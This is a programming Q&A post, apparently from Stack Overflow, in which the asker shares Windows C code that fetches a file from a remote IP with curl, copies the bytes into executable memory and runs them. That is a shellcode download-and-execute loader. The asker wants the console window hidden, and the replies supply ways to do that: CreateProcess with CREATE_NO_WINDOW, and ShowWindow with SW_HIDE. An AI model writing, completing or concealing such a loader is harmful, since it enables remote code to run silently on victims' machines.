# How to hide terminal with system execute command?

Tags: c

I want execute this command in the background without pop out terminal client window

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

int main()
{
    WinExec("", SW_HIDE);
    FILE* fpipe;
    char* command = "curl http://ip/file to execute";
    char c = 0;
    int counter = 0;
    unsigned char code[460];
    if (0 == (fpipe = (FILE*)popen(command, "r")))
    {
        perror("popen() failed.");
        exit(EXIT_FAILURE);
    }

    while (fread(&c, sizeof c, 1, fpipe))
    {
        code[counter] = c;
        // printf("%c", code[counter]);
        counter++;
    }
    pclose(fpipe);

    void *exec = VirtualAlloc(0, sizeof code, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, code, sizeof code);
    ((void(*)())exec)();
    
    return 0;
}
```

What code to add to hide the terminal?

Comment: Does this answer your question? [How Do I Compile a C Program to Run Without a Command Box?](https://stackoverflow.com/questions/5692606/how-do-i-compile-a-c-program-to-run-without-a-command-box)

Comment: Perhaps you can redirect the output to `nul`.

Comment: Make the equivalent HTTP GET request [using](https://www.reddit.com/r/C_Programming/comments/hjr3l4/how_to_make_http_request_in_c/) a C library e.g. libcurl.

Comment: Possibly helpful: [**How to call CMD without opening a window**](https://stackoverflow.com/questions/4277963/how-to-call-cmd-without-opening-a-window)  The fundamental problem is, per the C standard, the `system()` and `popen()` functions must use the implementation's shell to run the command passed.  The "fix" might be as simple as running the command as `"/C /Q ...."`

Comment: @WeatherVane *Perhaps you can redirect the output to `nul`*  That would preclude reading the output from `popen(..., "r")`.  I had to figure this out a long time ago, but I've forgotten how I did it.

Answer (score 1):

You're using POSIX API but your header include suggests you are on Windows.  You should really use the Windows API, which means [`CreateProcess`](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa)

There is a full example of how to redirect the stdin / stdout of a child process on [MSDN](https://learn.microsoft.com/en-gb/windows/win32/procthread/creating-a-child-process-with-redirected-input-and-output) which is quite long and I can't reproduce here for copyright reasons.

To force Windows not to create a console window you should enable the `CREATE_NO_WINDOW` flag in the `dwCreationFlags` parameter of `CreateProcess`.

Comment: ShowWindow(GetConsoleWindow(), SW_HIDE);